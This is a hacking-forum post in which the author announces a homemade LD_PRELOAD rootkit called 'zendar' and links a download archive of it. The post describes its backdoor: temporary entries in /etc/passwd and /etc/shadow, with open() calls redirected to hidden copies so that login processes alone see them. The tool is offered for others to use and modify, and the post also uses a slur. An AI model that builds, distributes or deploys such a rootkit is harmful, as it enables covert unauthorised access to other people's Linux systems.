[whatever]

"Not another shitty ld_preload rootkit..."
yes, it really is

I argued with myself if I should have posted this here or in the programming section. Please move this thread if my choice is incorrect.

I've tried creating kernel level kits, believe me, but my hacker card doesn't allow me to do that.

I've not contributed anything to the forum yet, so I figured I may as well upload this as it is the only somewhat significant thing I've worked on in the past 4 months. I made this in about 10 hours - of non-stop work - when I was bored out of my skull, it works but it's not that elaborate, you could more than likely create something more efficient in the same amount of time. It was an abstract project that I created for no reason.

You need to read the README, it's important, seriously.


Config settings are available in both zendar.c and the installation script itself.
The backdoor method works by creating a temporary entry in both /etc/passwd and /etc/shadow, and redirecting any open() calls - excluding login processes - to another file, /etc/.passwd and /etc/.shadow. The method is loud and insecure. Seriously, moral of the story, if you want a rootkit that is efficient and is guaranteed to hide effectively, then just buy one. On the other hand, if you want to create your own, then feel absolutely free to fuck around with mine.

If you want to ask questions, and I'm not studying for exams or doing anything gay, then message me. I'll more than likely reply.

Download it here: http://a.pomf.se/nicjgg.tar

Credits to the author of Azazel and Jynx2.
https://github.com/chokepoint/azazel
https://github.com/chokepoint/Jynx2

Would you mind putting it on github for those of us that don't want to actually download it so we can just view the code?